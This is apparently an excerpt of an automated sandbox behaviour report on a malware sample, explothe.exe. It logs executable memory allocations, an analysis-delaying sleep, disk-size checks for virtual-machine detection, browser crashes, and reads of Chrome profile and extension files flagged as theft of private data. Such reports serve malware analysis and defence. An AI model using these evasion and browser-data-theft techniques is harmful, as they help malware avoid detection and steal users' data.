NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00851000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00416000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c0f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d515000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f2b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e5a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

explothe.exe tried to sleep 172 seconds, actually delayed analysis time by 172 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (22 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2425383 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2425383 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2425002 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2425002 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2424646 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2424646 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2424325 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2424325 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2423883 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2423883 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2423743 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2423743 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2422441 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2422441 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2421798 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2421798 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2421265 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2421265 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2420718 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2420718 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2420381 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Nov. 3, 2023, 12:03 p.m.	number_of_free_clusters: 2420381 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (8 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 3048 crashed
Application Crash	Process iexplore.exe with pid 3120 crashed
Application Crash	Process chrome.exe with pid 3228 crashed
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 112586172 registers.edi: 93948924 registers.eax: 112586172 registers.ebp: 112586252 registers.edx: 94087589 registers.ebx: 112586536 registers.esi: 2147746133 registers.ecx: 94507816	1	0	0
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6a63540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6a6352ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6a710ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 77453072 registers.edi: 1974991376 registers.eax: 77453072 registers.ebp: 77453152 registers.edx: 1 registers.ebx: 8185500 registers.esi: 2147746133 registers.ecx: 312098352	1	0	0
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 113898596 registers.edi: 6412588 registers.eax: 113898596 registers.ebp: 113898676 registers.edx: 326 registers.ebx: 113898960 registers.esi: 2147746133 registers.ecx: 92093664	1	0	0
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x446 CreateURLMoniker-0x1418 urlmon+0x1c5f7 @ 0x752fc5f7 GetIDNFlagsForUri+0x1eb2 CreateIUriBuilder-0x8e7 urlmon+0x21ba9 @ 0x75301ba9 GetIDNFlagsForUri+0x19d4 CreateIUriBuilder-0xdc5 urlmon+0x216cb @ 0x753016cb GetIDNFlagsForUri+0x193d CreateIUriBuilder-0xe5c urlmon+0x21634 @ 0x75301634 GetIDNFlagsForUri+0xe85 CreateIUriBuilder-0x1914 urlmon+0x20b7c @ 0x75300b7c GetIDNFlagsForUri+0x12e3 CreateIUriBuilder-0x14b6 urlmon+0x20fda @ 0x75300fda CompareSecurityIds+0x207a GetClassFileOrMime-0x3330 urlmon+0x33246 @ 0x75313246 RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6a63540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6a6352ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6a710ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 101239672 registers.edi: 1974991376 registers.eax: 101239672 registers.ebp: 101239752 registers.edx: 1 registers.ebx: 6295292 registers.esi: 2147746133 registers.ecx: 337573925	1	0	0
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x1b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1b2e04 registers.r14: 243265160 registers.r15: 85336960 registers.rcx: 1224 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 243264416 registers.rsp: 243264136 registers.r11: 243268032 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1340 registers.r12: 243264776 registers.rbp: 243264272 registers.rdi: 86399696 registers.rax: 1781248 registers.r13: 86475616	1	0	0

Steals private information from local Internet browsers (50 out of 177 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
